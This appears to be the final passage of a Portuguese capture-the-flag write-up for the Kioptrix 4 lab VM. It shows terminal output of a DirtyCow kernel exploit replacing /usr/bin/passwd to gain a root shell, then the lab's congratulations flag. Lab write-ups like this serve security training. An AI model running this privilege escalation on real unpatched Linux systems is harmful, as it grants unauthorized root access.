thread stopped
ABORTED
john@Kioptrix4:/tmp$ ./c0w
(___)
(o o)_____/
@@ ` \
\ ____, //usr/bin/passwd
// //
^^ ^^
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap b7d91000
madvise 0
ptrace 0
john@Kioptrix4:/tmp$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:/tmp$ /usr/bin/passwd
root@Kioptrix4:/tmp# id
uid=0(root) gid=1001(john) groups=1001(john)
Então basta apenas pegar a bandeira!
root@Kioptrix4:/root# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
É isso, em breve mais write-ups